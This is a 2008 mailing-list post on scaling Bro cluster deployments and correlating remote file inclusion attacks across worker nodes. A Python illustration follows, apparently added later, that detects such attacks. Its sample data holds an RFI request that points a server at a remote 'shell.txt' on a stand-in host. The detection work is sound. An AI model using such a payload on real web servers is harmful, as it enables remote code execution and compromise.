[Discussion] Brainstorming Session Notes
Seth Hall
hall.692 at osu.edu
Tue Nov 18 14:46:41 UTC 2008
On Nov 18, 2008, at 10:28 AM, Matt Jonkman wrote:
> So what kind of overhead do you see on the clustering?
I'm probably not the best person to respond to this question, but I've
never had a feeling that the clustering adds too much overhead. It
forces me to write some of my scripts a little differently if they
need to watch for multiple actions between multiple hosts due to the
fact that I'm splitting the traffic across the worker nodes by src-dst
IP address pairs.
My canonical example of this is detecting hosts successfully
compromised by remote file inclusion vulnerabilities because one of my
workers might see the HTTP request with the attack and another worker
might see the web server go out and request a PHP script or
something. I need to keep a variable for a short time with the attack
HTTP request and synchronize it around to all of the cluster hosts so
that I can compare with any PHP scripts that might be requested by the
attacked host after that.
> Is your setup near the upper or lower end of where the overhead makes
> things feasible?
I've heard from the Bro developers that they've seen near linear
scaling of the cluster deployment up to 24 nodes. My cluster is a
really bad example though because of all of those Dells that are so
slow. The new quad core hosts seem to each be able to handle about
250Mbps in the way I currently have them configured (they're each
running two Bro processes). Once the multicore code in Bro is
functional though, I believe that I'll see significantly better
performance from them. Anyway, the cluster deployment is definitely
feasible and works quite well.
.Seth
---
Seth Hall
Network Security - Office of the CIO
The Ohio State University
Phone: 614-292-9721
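A Python model of the cross-worker correlation described in the message above, added here as an illustration; it is not code from the original post and not a Bro script. Requests are pinned to workers by src-dst pair, an RFI-style request records the attacked web server in a short-lived table, and the server's later outbound PHP fetch only correlates when that table is shared across workers. The sample requests, the two regexes and the 300-second expiry are constructed assumptions.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

Request = Tuple[float, str, str, str]  # (timestamp, src ip, dst ip, request URI)
# RFI-style request: a query parameter whose value is a full URL (assumed heuristic).
RFI_RE = re.compile(r"[?&][A-Za-z0-9_]+=https?://", re.IGNORECASE)
# Outbound fetch of a PHP script by a host already recorded as attacked.
PHP_RE = re.compile(r"\.php(?:\?|$)", re.IGNORECASE)
EXPIRE_SECS = 300.0  # assumed lifetime of an attack record in the shared table

def worker_for(src: str, dst: str, n_workers: int) -> int:
    """Pin both directions of a src-dst pair to the same worker (order-independent)."""
    key = int(ipaddress.ip_address(src)) ^ int(ipaddress.ip_address(dst))
    return key % n_workers

class Cluster:
    def __init__(self, n_workers: int, synchronize: bool = True) -> None:
        self.n = n_workers
        # Attacked server -> (time seen, attack URI). With synchronize=True every worker
        # shares one table, standing in for synchronized state; otherwise each worker
        # only knows what its own src-dst pairs carried.
        shared: Dict[str, Tuple[float, str]] = {}
        self.tables = [shared if synchronize else {} for _ in range(n_workers)]

    def process(self, req: Request) -> List[str]:
        ts, src, dst, uri = req
        table = self.tables[worker_for(src, dst, self.n)]
        for host, (seen, _) in list(table.items()):  # write-expire stale entries
            if ts - seen > EXPIRE_SECS:
                del table[host]
        alerts: List[str] = []
        if RFI_RE.search(uri):
            table[dst] = (ts, uri)  # remember which web server was attacked
        if src in table and PHP_RE.search(uri):
            attack_ts, attack_uri = table[src]
            alerts.append(f"{src} fetched {uri} {ts - attack_ts:.1f}s after RFI attempt {attack_uri}")
        return alerts

def run(requests: List[Request], n_workers: int, synchronize: bool) -> List[str]:
    cluster = Cluster(n_workers, synchronize)
    return [a for r in sorted(requests) for a in cluster.process(r)]

SAMPLE: List[Request] = [  # constructed records, not real traffic
    (100.0, "198.51.100.8", "203.0.113.10", "/index.php?page=http://192.0.2.5/shell.txt"),
    (101.5, "203.0.113.10", "192.0.2.5", "/shell.php"),
    (102.0, "198.51.100.9", "203.0.113.11", "/about.php"),
    (900.0, "203.0.113.10", "192.0.2.5", "/late.php"),  # too late: record expired
]
```

Calling run(SAMPLE, 2, synchronize=True) yields the one correlated alert, while run(SAMPLE, 2, synchronize=False) yields nothing because the attack record and the PHP fetch land on different workers.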